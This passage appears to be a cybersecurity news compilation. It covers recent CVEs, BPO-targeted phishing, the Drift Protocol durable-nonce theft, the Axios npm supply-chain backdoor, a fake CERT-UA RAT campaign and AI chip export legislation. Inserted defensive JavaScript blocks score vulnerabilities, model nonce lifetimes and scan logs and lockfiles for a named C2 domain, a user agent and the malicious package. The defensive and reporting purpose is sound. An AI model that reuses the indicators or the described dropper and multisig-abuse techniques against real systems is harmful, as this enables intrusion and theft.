A malicious RDP server or man-in-the-middle attacker can exploit this flaw to execute arbitrary code, potentially compromising remote desktop clients and enterprise environments.

CVE-2026-1207 — Django (High)

CVE-2026-1207 is a SQL injection vulnerability in Django applications using PostGIS RasterField lookups.

Insufficient input validation allows attackers to inject malicious SQL queries, leading to data exposure, modification, and potential lateral movement within backend systems.

CVE-2025-53521 — F5 BIG-IP APM (Critical)

CVE-2025-53521 is a critical vulnerability in F5 BIG-IP Access Policy Manager, initially classified as a DoS flaw but later reclassified as unauthenticated remote code execution following active exploitation.

This vulnerability allows attackers to gain full control of access management systems, posing significant risks to enterprise networks.

Top 10 Impacted Products
Data Source: Cyble Vision

Vulnerabilities Added to CISA KEV

CISA continued expanding its KEV catalog, reflecting active exploitation trends.

Notable addition:

CVE-2025-53521 — F5 BIG-IP APM
Initially considered a denial-of-service flaw, it was reclassified as a remote code execution vulnerability after evidence of active exploitation emerged.

This shows how vulnerabilities can evolve in severity over time, reinforcing the need for continuous reassessment and monitoring.

Critical ICS Vulnerabilities

CISA issued 7 ICS advisories covering 10 vulnerabilities, with several rated critical.

CISA ICS Vendor Spotlight
Data Source: Cyble Vision

CVE-2026-2417 — Pharos Controls (Critical)

This vulnerability involves missing authentication for critical functions in Mosaic Show Controller firmware.

Attackers can exploit this flaw to gain unauthorized control over industrial systems, potentially disrupting operations.

CVE-2025-49844 — Schneider Electric Plant iT/Brewmaxx (Critical)

A use-after-free vulnerability in Schneider Electric’s industrial automation platform can lead to memory corruption and system compromise.

The presence of multiple vulnerabilities in this platform reflects systemic risk across widely deployed industrial environments.

CVE-2026-3587 — WAGO Managed Switches (Critical)

This vulnerability exposes hidden functionality in industrial switches, potentially enabling attackers to bypass controls and gain unauthorized access.

CVE-2026-4681 — PTC Windchill PDMLink (Critical)

This vulnerability involves improper control of code generation and currently has no available patch, leaving organizations exposed.

Grassroots DICOM (High, Unpatched)

A memory management flaw in Grassroots DICOM impacts healthcare imaging systems, with no vendor patch available, increasing risk to medical infrastructure.

Impacted Critical Infrastructure Sectors

Analysis shows that:

  • Commercial Facilities appear in 70% of ICS vulnerabilities
  • Critical Manufacturing and Energy each account for 60%
  • Healthcare, communications, and transportation sectors also face exposure

Impacted Critical Infrastructure Sectors
Data Source: Cyble Vision

This distribution shows the strong cross-sector dependencies, where vulnerabilities in industrial platforms can cascade into multiple critical infrastructure domains.

Conclusion

This week’s findings highlight a convergence of:

  • Increasing vulnerability volume and severity
  • Rapid exploitation cycles driven by PoC availability
  • Active underground discussion and weaponization
  • Persistent weaknesses in industrial control systems

With 248 publicly available PoCs, KEV additions confirming active exploitation, and unpatched ICS vulnerabilities, organizations face significant risk across both enterprise IT and operational technology environments.

Key Recommendations

  • Prioritize vulnerabilities based on exploit availability and operational impact
  • Patch critical enterprise systems and externally exposed services immediately
  • Implement strong input validation and secure coding practices
  • Harden remote access and RDP environments
  • Segment IT and OT networks to limit lateral movement
  • Apply compensating controls for unpatched ICS vulnerabilities
  • Continuously monitor threat intelligence and underground forums
  • Conduct regular vulnerability assessments and penetration testing
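
The first recommendation, prioritizing on exploit availability and operational impact rather than on CVSS alone, is easy to state and easy to get wrong in a ticket queue. The following scorer is an added illustration, not Cyble's tooling: it weights KEV listing, public PoC, underground chatter, external exposure and patch availability ahead of the base score and maps each record to an action. The CVE ids are the ones named in this report; the inKev and noPatch flags follow what the report states, while the cvss, pocPublic, undergroundChatter and externallyExposed values attached to them are constructed for the example.

```javascript
// Added illustration, not Cyble's tooling: a triage scorer that ranks
// vulnerability records the way the recommendations above describe, putting
// evidence of exploitation (KEV listing, public PoC) and exposure ahead of
// raw CVSS. The CVE ids are the ones named in this report; inKev and noPatch
// follow the report, every other attribute below is a constructed value.

const TRIAGE_WEIGHTS = {
  inKev: 40,              // CISA KEV listing = confirmed in-the-wild exploitation
  pocPublic: 25,          // a public PoC shortens the exploitation timeline
  undergroundChatter: 10, // discussed on underground forums
  externallyExposed: 15,  // reachable from the internet
  noPatch: 10,            // unpatched: needs compensating controls, not a ticket
};

function cvssPoints(cvss) {
  // CVSS contributes at most 10 points, so a 9.8 with no exploitation
  // evidence never outranks a 7.5 that is listed in KEV.
  return Math.max(0, Math.min(10, Number(cvss) || 0));
}

function scoreVulnerability(v) {
  let score = cvssPoints(v.cvss);
  for (const [flag, weight] of Object.entries(TRIAGE_WEIGHTS)) {
    if (v[flag]) score += weight;
  }
  return score;
}

function recommendedAction(v) {
  if (v.noPatch) return 'compensating-controls';   // isolate, restrict access, monitor
  if (v.inKev || (v.pocPublic && v.externallyExposed)) return 'patch-immediately';
  if (v.pocPublic) return 'patch-this-cycle';
  return 'scheduled';
}

// Returns the records sorted by descending score; ties break on CVE id so
// the output is deterministic.
function triage(vulns) {
  return vulns
    .map(v => ({ id: v.id, product: v.product, score: scoreVulnerability(v), action: recommendedAction(v) }))
    .sort((a, b) => (b.score - a.score) || a.id.localeCompare(b.id));
}

// Constructed sample set (see the note above about which fields are assumed).
const SAMPLE_VULNS = [
  { id: 'CVE-2025-53521', product: 'F5 BIG-IP APM', cvss: 9.8, inKev: true, pocPublic: true, undergroundChatter: true, externallyExposed: true, noPatch: false },
  { id: 'CVE-2026-4747', product: 'FreeBSD RPCSEC_GSS', cvss: 9.8, inKev: false, pocPublic: true, undergroundChatter: false, externallyExposed: true, noPatch: false },
  { id: 'CVE-2026-1207', product: 'Django (PostGIS RasterField)', cvss: 7.5, inKev: false, pocPublic: false, undergroundChatter: false, externallyExposed: false, noPatch: false },
  { id: 'CVE-2026-4681', product: 'PTC Windchill PDMLink', cvss: 9.1, inKev: false, pocPublic: false, undergroundChatter: false, externallyExposed: false, noPatch: true },
];

console.log(triage(SAMPLE_VULNS));
```

With these inputs the KEV-listed F5 flaw ranks first and the unpatched PTC flaw is routed to compensating controls rather than a patch ticket, which is the point of separating "score" from "action": an unpatchable critical needs segmentation and monitoring now, not a reminder to patch later.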

Cyble’s attack surface management and vulnerability intelligence solutions enable organizations to identify exposed assets, prioritize remediation, and detect early indicators of compromise. By combining threat intelligence with proactive defense strategies, organizations can effectively mitigate evolving risks across enterprise and critical infrastructure environments.


UNC6783 Turns BPO Providers into Cyberattack Gateways


A cybercriminal group identified as UNC6783 is targeting business process outsourcing (BPO) companies, likely as a gateway to infiltrate major organizations across various industries. The Google Threat Intelligence Group reports that this tactic has already affected dozens of companies, with attackers stealing sensitive information to pressure victims into paying ransoms.

According to principal threat analyst Austin Larsen, the group primarily depends on phishing schemes and social engineering tactics to compromise BPO providers that support their intended targets. In some cases, attackers have gone a step further by directly engaging with internal support or helpdesk teams to gain unauthorized access.

Investigators also believe UNC6783 may be connected to a cybercriminal persona known as “Raccoon,” which has previously focused on BPO firms serving large enterprises.
One notable technique involves manipulating support staff through live chat interactions. Employees are tricked into visiting counterfeit login pages that mimic Okta portals. These fraudulent sites are hosted on domains designed to resemble legitimate ones, often following a pattern like [.]zendesk-support<##>[.]com.

Larsen notes that the phishing toolkit used in these campaigns is particularly advanced—it can capture clipboard data, allowing attackers to bypass multi-factor authentication (MFA) and register their own devices within compromised systems. In addition to phishing, the group has also distributed fake security updates that install remote access malware, further expanding their control over victim networks.

Once data is obtained, the attackers initiate extortion efforts, typically reaching out via ProtonMail accounts to demand payment in exchange for not releasing the stolen information.

Although further details about “Raccoon” remain limited, the International Cyber Digest recently reported that an individual using the alias “Mr. Raccoon” claimed responsibility for a breach involving Adobe—a claim that has not yet been confirmed. According to these claims, the breach occurred after compromising an India-based BPO associated with Adobe. The attacker allegedly installed a remote access trojan (RAT) on an employee’s system and later targeted the employee’s manager through a phishing campaign. The individual further asserted that approximately 13 million support tickets were stolen, including personal data, employee details, vulnerability reports submitted via HackerOne, and internal company documents.

To mitigate risks from UNC6783, Google’s Mandiant division recommends several defensive measures. These include adopting FIDO2-based hardware keys for MFA, closely monitoring live chat systems for suspicious activity, blocking domains that mimic Zendesk naming patterns, and routinely reviewing MFA device registrations for unauthorized additions.

North Korea Spent 6 Months Infiltrating Drift Protocol Only to Drain $285M in 12 Mins


The message Drift Protocol posted to X on April 1 opened with an unusual disclaimer: "This is not an April Fools joke." Within hours, the reason became clear. A $285 million exploit had wiped out more than half of the Solana-based decentralized perpetual futures exchange's total value locked — and the attack had been in preparation for six months.

A malicious actor gained unauthorized access to Drift Protocol through a novel attack involving durable nonces, resulting in a rapid takeover of Drift's Security Council administrative powers. The incident, which took place on April 1, was confirmed as a highly sophisticated operation involving multi-week preparation and staged execution.

Drift is the largest decentralized perpetual futures exchange on Solana, a blockchain network. It allows users to trade leveraged financial positions without a centralized intermediary. The protocol held approximately $550 million in user assets before the attack. According to TRM Labs, the drain took roughly 12 minutes, making this the largest DeFi hack of 2026 and the second-largest exploit in Solana's history, behind only the $326 million Wormhole bridge hack in 2022.

A Six-Month Long-Con Operation

A North Korean state-linked group spent roughly six months infiltrating Drift Protocol under the guise of a quantitative trading firm before executing the exploit. The attackers built trust by meeting Drift contributors at conferences, depositing more than $1 million, and integrating an Ecosystem Vault. They then compromised devices via a malicious TestFlight app and a VSCode/Cursor vulnerability to obtain multisig approvals.

On-chain staging began on March 11, nearly three weeks before the April 1 execution, with a 10 ETH withdrawal from Tornado Cash. The funds began moving at around 12:00 AM GMT on March 12 — approximately 9:00 AM Pyongyang time — and shortly after funded the deployment of CarbonVote Token (CVT), the fictitious asset used to manipulate Drift's price oracles.

The Fake Token That Fooled an Oracle

A key element of the attack was entirely manufactured. The attacker created CarbonVote Token (CVT), minting around 750 million units, seeded a small liquidity pool of approximately $500 on the Raydium decentralized exchange, and used wash trading — artificial back-and-forth trades between attacker-controlled wallets — to build a price history near $1. Over time, this artificial price was picked up by oracles, making the token appear legitimate.

An oracle, in the context of blockchain protocols, is a system that feeds real-world price data into smart contracts so that a protocol knows the value of the assets it holds. By manufacturing a fake price history for a worthless token, the attackers tricked Drift's oracles into treating CVT as legitimate collateral worth hundreds of millions of dollars.

Durable Nonces: The Governance Weapon

The attack's most novel element exploited a legitimate Solana feature called durable nonces. By securing two misleading approvals from Drift's five-member Security Council multisig, the attacker pre-signed transactions that remained valid for more than a week, then used them to seize protocol-level control in minutes.

A multisig — short for multi-signature — is a governance structure where multiple people must approve any administrative action, so compromising one person is insufficient. Durable nonces allow transactions on Solana to be pre-signed and executed later, a feature designed for operational convenience. In this attack, the attackers obtained two of the five required signatures through social engineering — presenting the signers with what appeared to be routine transactions — and held those approvals dormant until execution day.

When Drift executed a legitimate Security Council migration on March 27, the attacker adapted. By March 30, new nonce activity appeared tied to a member of the updated multisig, indicating the attacker had re-obtained the required two-of-five approval threshold under the new configuration. On April 1, two transactions, four slots apart on the Solana blockchain, created and approved a malicious admin transfer, then executed it. Within minutes, the attacker had full control of Drift's protocol-level permissions and used it to introduce a fraudulent withdrawal mechanism and drain the vaults.
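
The lifetime difference that made the dormant approvals possible is easier to see in a toy model than in prose. The block below is an added illustration, not Drift's or Solana's code: a miniature ledger in which a normal transaction dies once its recent blockhash ages out of the window (about 150 slots on Solana) while a durable-nonce transaction stays valid until the nonce account it references is advanced, plus the review check a multisig signer's tooling should apply before signing. Slot counts, hash formats, the account names and the `reviewBeforeSigning` policy are simplifications invented for this example.

```javascript
// Added illustration, not Drift's or Solana's code. Models the two
// transaction lifetimes described above: recent-blockhash transactions
// expire after a short window, durable-nonce transactions stay valid until
// the nonce is advanced, which is what let pre-signed approvals sit dormant.
// Slot counts, hash formats and the signer policy are simplifications.

const BLOCKHASH_WINDOW_SLOTS = 150; // approximate real-world window

class ToyLedger {
  constructor() {
    this.slot = 0;
    this.recentBlockhashes = [this.blockhashFor(0)]; // oldest first, newest last
    this.nonceAccounts = new Map();                  // account -> current nonce value
    this.nonceCounter = 0;
  }
  blockhashFor(slot) { return `blockhash-${slot}`; }
  latestBlockhash() { return this.recentBlockhashes[this.recentBlockhashes.length - 1]; }
  advanceSlots(n) {
    for (let i = 0; i < n; i++) {
      this.slot += 1;
      this.recentBlockhashes.push(this.blockhashFor(this.slot));
      if (this.recentBlockhashes.length > BLOCKHASH_WINDOW_SLOTS) this.recentBlockhashes.shift();
    }
  }
  createNonceAccount(account) { this.advanceNonce(account); return this.nonceAccounts.get(account); }
  advanceNonce(account) { this.nonceAccounts.set(account, `nonce-${account}-${++this.nonceCounter}`); }
  // Validity at execution time: a nonce-backed tx is checked against the live
  // nonce value, a normal tx against the recent-blockhash window.
  isValid(tx) {
    if (tx.nonceAccount) return this.nonceAccounts.get(tx.nonceAccount) === tx.recentBlockhash;
    return this.recentBlockhashes.includes(tx.recentBlockhash);
  }
  execute(tx) {
    if (!this.isValid(tx)) return false;
    if (tx.nonceAccount) this.advanceNonce(tx.nonceAccount); // each nonce value is single-use
    return true;
  }
}

// What a multisig member's review tooling should surface before signing:
// the approval on a nonce-backed proposal does not expire on its own.
function reviewBeforeSigning(tx, ledger) {
  const findings = [];
  if (tx.nonceAccount) findings.push('durable-nonce: approval stays valid until the nonce is advanced');
  if (tx.instructions.includes('set_admin')) findings.push('admin-transfer: changes protocol-level authority');
  if (!tx.nonceAccount && !ledger.recentBlockhashes.includes(tx.recentBlockhash)) findings.push('expired-blockhash: cannot execute');
  return findings;
}

function simulate() {
  const ledger = new ToyLedger();
  const nonceValue = ledger.createNonceAccount('attacker-nonce');
  // Two proposals signed at the same moment, differing only in lifetime.
  const normalTx = { recentBlockhash: ledger.latestBlockhash(), nonceAccount: null, instructions: ['set_admin'] };
  const nonceTx = { recentBlockhash: nonceValue, nonceAccount: 'attacker-nonce', instructions: ['advance_nonce', 'set_admin'] };
  const findings = reviewBeforeSigning(nonceTx, ledger);

  ledger.advanceSlots(100000); // far beyond the ~150-slot window
  const normalStillValid = ledger.isValid(normalTx);
  const nonceStillValid = ledger.isValid(nonceTx);
  const executed = ledger.execute(nonceTx);
  const replayAccepted = ledger.execute(nonceTx); // nonce advanced, so a replay must fail
  return { normalStillValid, nonceStillValid, executed, replayAccepted, findings };
}

console.log(simulate());
```

The defensive takeaway is the `reviewBeforeSigning` output: a signer who sees "durable-nonce" next to "admin-transfer" knows that the approval they are about to give has no natural expiry and can be executed at a time of the holder's choosing, so it deserves the scrutiny of a live admin action rather than a routine batch.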

DPRK Attribution and Laundering

Investigators attributed the attack to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet, based on both on-chain fund flows tracing back to the Radiant Capital attackers and operational overlap with known DPRK-linked personas.

Stolen assets were consolidated and swapped into USDC and SOL, then partially bridged to Ethereum using Circle's Cross-Chain Transfer Protocol. On Ethereum, portions were converted into ETH while some funds moved through centralized exchanges. On-chain investigator ZachXBT publicly criticized Circle for failing to freeze the stolen USDC despite it crossing during U.S. business hours, contrasting that inaction with Circle's recent decision to freeze unrelated corporate wallets in a civil case.

If confirmed, the Drift incident would represent the eighteenth DPRK-linked crypto theft Elliptic has tracked in 2026, with over $300 million stolen to date. DPRK-linked actors have stolen over $6.5 billion in cryptoassets in recent years, with proceeds linked to funding North Korea's weapons programs.

The Drift exploit did not occur in isolation. It landed on the same day multiple security vendors attributed the Axios npm supply chain attack to North Korean group UNC1069 — a simultaneous two-front operation against the software development ecosystem and the crypto finance layer that funds Pyongyang's strategic programs.
Drift has frozen all protocol functions, removed the compromised wallet from the multisig, and is coordinating with security firms, exchanges, bridges, and law enforcement to trace and recover stolen assets. A detailed postmortem is expected. The DRIFT token fell more than 20% following news of the exploit.

North Korea’s Lazarus Group Behind the Axios npm Supply Chain Attack


On Monday, the Axios npm supply chain attack came to light: a malicious dependency had been inserted into one of JavaScript's most widely used libraries. Three major threat intelligence firms have now attributed the attack to North Korea's Lazarus Group, and the scale of the fallout is considerably larger than initially understood.

The attack was confirmed as North Korean state-sponsored when Google Threat Intelligence Group published its attribution, identifying the responsible actor as UNC1069 — a financially motivated North Korea-nexus group active since at least 2018 and tracked by Mandiant, now part of Google. ThreatBook independently reached the same conclusion, attributing the campaign to Lazarus Group based on long-term APT tracking data and overlapping infrastructure artifacts.

Between March 31, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named plain-crypto-js into the axios npm releases 1.14.1 and 0.30.4. Axios is the most popular JavaScript library for simplifying HTTP requests, with its packages typically seeing over 100 million and 83 million weekly downloads, respectively.

npm is the world's largest software registry — the system JavaScript developers use to download and install code libraries their applications depend on. A postinstall hook is a script that executes automatically, silently, the moment a developer runs npm install. The attackers exploited both to devastating effect.

How the Attack Was Staged

Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled ProtonMail account. The threat actor used the postinstall hook within the package.json file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, npm automatically executed an obfuscated JavaScript dropper named setup.js in the background.

The dropper, tracked by GTIG as SILKBELL, dynamically checks the target system's operating system and delivers platform-specific payloads.

  • On Windows, it copies PowerShell to a renamed binary and downloads a PowerShell script to the user's Temp directory.
  • On macOS, it downloads a native Mach-O binary to /Library/Caches/com.apple.act.mond.
  • On Linux, it drops a Python backdoor to /tmp/ld.py.

After successfully dropping each payload, the dropper attempts to delete itself and revert the modified package.json. This acts as an anti-forensic cleanup step designed to remove evidence of the postinstall hook entirely.

The platform-specific payloads deploy a backdoor tracked by GTIG as WAVESHAPER.V2 — a C++ backdoor that collects system information, enumerates directories, and executes additional payloads, connecting to the command-and-control server at sfrclak[.]com:8000/6202033. GTIG's attribution to UNC1069 rests specifically on WAVESHAPER.V2 being an updated version of WAVESHAPER, a backdoor previously used by this group, combined with infrastructure overlap across past UNC1069 campaigns.

All payload variants use the same anachronistic user-agent string — an Internet Explorer 8 string on Windows XP — which is highly anomalous in 2026 and a reliable detection indicator. The C2 path /6202033, when reversed, reads 3-30-2026, the date of the attack.
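
Both indicators in the paragraph above translate directly into log detection. The block below is an added illustration, not GTIG's or Huntress's detection content: it parses constructed proxy log lines and flags egress to the sfrclak[.]com C2 on port 8000 with the /6202033 path, and separately flags any Internet Explorer 8 on Windows XP user agent. The article does not quote the exact user-agent string the payloads send, so the check matches the well-known IE8/XP token pair (MSIE 8.0 together with Windows NT 5.1) rather than one literal value; the log layout, hostnames and the 203.0.113.9 documentation address are invented for the example.

```javascript
// Added illustration, not GTIG's or Huntress's detection content: flags the
// C2 destination and the anachronistic IE8/XP user agent named above over
// constructed proxy log lines. The exact UA string is not quoted in the
// article, so the UA check matches the MSIE 8.0 + Windows NT 5.1 token pair.

const C2_HOST = 'sfrclak.com'; // written sfrclak[.]com (defanged) in the article
const C2_PORT = 8000;
const C2_PATH = '/6202033';

// Constructed log lines in a simplified `ts host src dst:port path "ua"` layout.
// 203.0.113.9 is a documentation address standing in for an unknown IP, not a real IoC.
const SAMPLE_LOG = `
2026-03-31T01:02:03Z build-01 10.0.4.12 registry.npmjs.org:443 /axios "npm/10.5.0 node/v20.11.1 linux x64"
2026-03-31T01:02:41Z build-01 10.0.4.12 sfrclak.com:8000 /6202033 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
2026-03-31T01:03:10Z dev-mac-7 10.0.9.33 updates.example.com:443 /check "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) Safari/605.1.15"
2026-03-31T01:05:55Z dev-mac-7 10.0.9.33 203.0.113.9:8000 /6202033 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
`;

function parseLine(line) {
  const m = /^(\S+) (\S+) (\S+) (\S+):(\d+) (\S+) "(.*)"$/.exec(line.trim());
  if (!m) return null;
  return { ts: m[1], host: m[2], src: m[3], dst: m[4], port: Number(m[5]), path: m[6], ua: m[7] };
}

function isAnachronisticUA(ua) {
  // IE8 shipped in 2009 and Windows XP (NT 5.1) left support in 2014; neither
  // belongs in the outbound traffic of a 2026 developer workstation or build host.
  return /\bMSIE 8\.0\b/.test(ua) && /Windows NT 5\.1/.test(ua);
}

// Returns the list of reasons a record is suspicious (empty = nothing matched).
function classify(rec) {
  const reasons = [];
  if (rec.dst.toLowerCase() === C2_HOST) reasons.push('known-c2-domain');
  if (rec.port === C2_PORT && rec.path === C2_PATH) reasons.push('known-c2-port-and-path');
  if (isAnachronisticUA(rec.ua)) reasons.push('anachronistic-ie8-xp-user-agent');
  return reasons;
}

function detect(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const rec = parseLine(line);
    if (!rec) continue;
    const reasons = classify(rec);
    if (reasons.length > 0) hits.push({ ts: rec.ts, host: rec.host, dst: rec.dst, reasons });
  }
  return hits;
}

console.log(detect(SAMPLE_LOG));
```

The fourth sample line is there to make a point about layering: a host that beacons to an IP instead of the domain name slips past a domain block, but the user-agent and port/path indicators still fire, so a detection built only on "block sfrclak[.]com" is weaker than one that also alerts on the client fingerprint.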

The Blast Radius

The malicious axios versions were removed within a few hours, but axios is present in approximately 80% of cloud and code environments and is downloaded roughly 100 million times per week, enabling rapid exposure, with observed execution in 3% of affected environments.

Mandiant CTO Charles Carmakal framed the downstream risk in serious terms. Carmakal said the blast radius of the axios npm supply chain attack is broad and extends to other popular packages that have dependencies on it, and warned that the secrets stolen over the past two weeks will enable more software supply chain attacks, SaaS environment compromises leading to downstream customer compromises, ransomware and extortion events, and crypto heists over the next several days, weeks, and months.

He noted awareness of hundreds of thousands of stolen credentials, with a variety of actors across varied motivations behind these attacks.

GTIG Chief Analyst John Hultquist said North Korean hackers have deep experience with supply chain attacks, which they have historically used to steal cryptocurrency, and that given the popularity of the compromised package, the full breadth of the incident is still unclear but far-reaching impacts are expected.

Huntress identified approximately 135 compromised devices. However, the true number affected during the three-hour window remains under investigation.

What Defenders Should Do Now

Any engineering team that ran npm install between 00:21 UTC and approximately 03:20 UTC on March 31 should treat their environment as potentially compromised.

Defenders should check for RAT artifacts at /Library/Caches/com.apple.act.mond (macOS), %PROGRAMDATA%\wt.exe (Windows), and /tmp/ld.py (Linux); downgrade to axios 1.14.0 or 0.30.3; remove plain-crypto-js from node_modules; audit CI/CD pipeline logs for the affected window; rotate all credentials on any system where RAT artifacts are found; and block egress to sfrclak[.]com.
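
The version check and the search for plain-crypto-js can be done against the lockfile rather than by hand. The block below is an added illustration, not GTIG's, Huntress's or the axios project's code: it audits an npm lockfile in the lockfileVersion 2/3 "packages" layout for an affected axios release anywhere in the tree, for plain-crypto-js as an installed package or as a declared dependency, and for any package that declares install scripts at all, since a postinstall hook is what gave the dropper silent execution. The lockfile fragment is constructed to exercise each case; the version numbers are the ones named above, and `hasInstallScript` is the flag npm writes for packages with install-time lifecycle scripts.

```javascript
// Added illustration, not GTIG's, Huntress's or the axios project's code: an
// audit over an npm lockfile (lockfileVersion 2/3 "packages" layout) for the
// affected axios releases, the plain-crypto-js dependency, and any package
// with install scripts. The lockfile fragment is constructed for the example.

const AFFECTED_AXIOS = new Set(['1.14.1', '0.30.4']);
const SAFE_AXIOS = { '1.14.1': '1.14.0', '0.30.4': '0.30.3' }; // downgrade targets from the article
const MALICIOUS_DEP = 'plain-crypto-js';

// Constructed lockfile fragment (not from any real project).
const SAMPLE_LOCK = {
  name: 'example-service',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-service', dependencies: { axios: '^1.14.0', express: '^4.19.0' } },
    'node_modules/axios': { version: '1.14.1', dependencies: { 'plain-crypto-js': '*' } },
    'node_modules/plain-crypto-js': { version: '1.0.0', hasInstallScript: true },
    'node_modules/express': { version: '4.19.2' },
    'node_modules/some-tool/node_modules/axios': { version: '1.14.0' }, // nested, unaffected
  },
};

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageNameFromPath(lockPath) {
  const marker = 'node_modules/';
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? lockPath : lockPath.slice(idx + marker.length);
}

function auditLockfile(lock) {
  const findings = { affectedAxios: [], maliciousDependency: [], installScripts: [] };
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    if (lockPath === '') continue; // the root project entry
    const name = packageNameFromPath(lockPath);
    if (name === 'axios' && AFFECTED_AXIOS.has(entry.version)) {
      findings.affectedAxios.push({ path: lockPath, version: entry.version });
    }
    if (name === MALICIOUS_DEP) {
      findings.maliciousDependency.push({ path: lockPath, version: entry.version });
    }
    if (entry.dependencies && Object.prototype.hasOwnProperty.call(entry.dependencies, MALICIOUS_DEP)) {
      findings.maliciousDependency.push({ path: lockPath, dependsOn: MALICIOUS_DEP });
    }
    if (entry.hasInstallScript) findings.installScripts.push(lockPath);
  }
  findings.compromised = findings.affectedAxios.length > 0 || findings.maliciousDependency.length > 0;
  return findings;
}

// Turns findings into the response steps listed above.
function remediationSteps(findings) {
  const steps = [];
  for (const a of findings.affectedAxios) {
    steps.push(`pin axios ${a.version} -> ${SAFE_AXIOS[a.version]} at ${a.path}`);
  }
  if (findings.maliciousDependency.length > 0) {
    steps.push(`remove ${MALICIOUS_DEP} from node_modules and the lockfile`);
  }
  if (findings.compromised) {
    steps.push('treat hosts that ran npm install in the window as compromised: check for RAT artifacts, audit CI logs, rotate credentials');
  }
  for (const p of findings.installScripts) steps.push(`review install script of ${p}`);
  return steps;
}

console.log(remediationSteps(auditLockfile(SAMPLE_LOCK)));
```

Running this against each repository's package-lock.json in CI is cheap; the install-script listing is also worth keeping permanently, since a new package appearing with `hasInstallScript` is exactly the change that deserves review. Installing with `npm ci --ignore-scripts` on build agents removes the silent-execution vector entirely, at the cost of having to run the few legitimate install scripts explicitly.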

Hackers Impersonate Ukrainian CERT to Plant a RAT on Government, Hospital Networks


Ukraine's frontline cyber defense agency became the subject of its own investigation last week after an unknown threat actor built a convincing fake version of its website, sent emails impersonating its staff and instructed recipients across the country to download malware packaged as official security software.

The Computer Emergency Response Team of Ukraine, CERT-UA, disclosed on Sunday that between March 26 and 27, attackers distributed emails falsely attributed to CERT-UA, urging recipients to download a password-protected archive named either "CERT_UA_protection_tool.zip" or "protection_tool.zip". The file was made available for download from the Files.fm file-sharing service and installed what the messages described as specialized protective software.

The phishing emails were targeted at a broad cross-section of Ukrainian institutions including government organizations, medical centers, security companies, educational institutions, financial institutions and software development firms.

Supporting the phishing campaign, attackers had registered and populated a counterfeit website at cert-ua[.]tech — a domain created on March 27, just one day into the distribution window. The lookalike website had content lifted directly from the official CERT-UA website at cert[.]gov[.]ua, alongside fabricated instructions for downloading the malicious "protection tool."

The executable file inside those archives was not protective software. CERT-UA classified it as AGEWHEEZE, a full-featured Remote Access Trojan (RAT) written in the Go programming language. A RAT is malware that gives an attacker complete remote control over an infected machine: not just file access, but live screen viewing, keyboard and mouse emulation, command execution, process and service management, clipboard reading and writing, and the ability to shut down, restart, or lock the device entirely.

AGEWHEEZE's command set is exhaustive and purpose-built for persistent, covert control. It supports screen capture and real-time input emulation, full file system operations including read, write, delete, rename, and directory creation, process killing, service control, autorun management, terminal access, and the ability to open arbitrary URLs on the victim machine. AGEWHEEZE establishes persistence through the Windows registry startup key, the Startup directory, or a scheduled task, creating entries named "SvcHelper" or "CoreService" depending on the infection path. All communications to its command-and-control server route over WebSocket connections to a server hosted on infrastructure belonging to French cloud provider OVH.

That command-and-control server carried its own revealing details. On port 8443, a web page titled "The Cult" displayed an authentication form. Buried in the HTML source of that page, investigators found Russian-language text reading: "Membership suspended. Your access to the Cult has been blocked. Contact the administrator to restore it." The self-signed SSL certificate on the server was created on March 18, with "TVisor" listed in the Organization field, matching the internal package name found inside the malware itself: "/example.com/tvisor/agent".

Attribution arrived quickly and from the attackers themselves. A review of the AI-generated fake website at cert-ua[.]tech uncovered a line embedded in the HTML code reading: "With Love, CYBER SERP — https://t[.]me/CyberSerp_Official."

Fake website and HTML code embedding CyberSerp details. (Source: CERT-UA)

On March 28, the day after the campaign launched, the Telegram channel referenced in that code published a message claiming responsibility for the attack, eliminating any ambiguity about attribution. CERT-UA created the tracking identifier UAC-0255 for this activity. The agency assessed the cyberattack as "unsuccessful." No more than a few personal devices belonging to employees of educational institutions were identified as infected.

CERT-UA said its specialists provided methodological and practical assistance to affected parties, and acknowledged Ukrainian electronic communications providers for their contribution to delivering cyber threat information to subscribers and maintaining national cyber incident response infrastructure.

CERT-UA itself has previously documented campaigns by multiple threat groups — including UAC-0002, UAC-0035, and the group tracked here as UAC-0252 — that similarly weaponize government branding. In this case, the attackers targeted the cyber defense agency whose name carries the highest authority in Ukrainian information security communications, turning that trust directly against the institutions that rely on it.

CERT-UA noted that the development of artificial intelligence significantly simplifies the execution of cyber threats. The attackers' own use of an AI-generated phishing site is a direct illustration of that warning, the cyber defense agency explained. It recommended that organizations reduce their attack surface by configuring standard operating system protections including Software Restriction Policies and AppLocker, and deploying specialized endpoint protection tools. Full indicators of compromise including file hashes, network indicators, and host-based artifacts are available in the CERT-UA advisory.

Congress Wants a GPS Tracker on Every Advanced AI Chip America Exports


DeepSeek changed the calculation. When the House Select Committee on China concluded in early 2025 that the Chinese AI company had trained its flagship model on restricted Nvidia AI chips that should never have reached it, Congress stopped treating chip smuggling as an enforcement failure and started treating it as a legislative emergency — one that arrived on the House Foreign Affairs Committee's desk this week.

The House Foreign Affairs Committee passed the Chip Security Act with bipartisan support on Thursday, advancing legislation to curb the smuggling of American semiconductors to foreign adversaries. The bill was introduced in May 2025 as a direct response to concerns raised by the Select Committee on China in its report on DeepSeek, which concluded the company used advanced Nvidia chips restricted from export to China to develop its AI model.

Here's What the AI Chip Security Act Is

The core mechanism the Chip Security Act puts forward is location verification — the requirement that advanced AI chips exported from the United States carry a technical security mechanism, whether implemented in software, firmware, or hardware, that continuously confirms where the device physically sits.

The bill requires the Secretary of Commerce to mandate, within 180 days of enactment, that any covered integrated circuit product be outfitted with chip security mechanisms implementing location verification before it is exported, reexported, or transferred to a foreign country. Covered products include chips classified under Export Control Classification Numbers 3A090, 3A001.z, 4A090, and 4A003.z — the precise classifications that cover Nvidia's H100 and equivalent advanced AI accelerators.

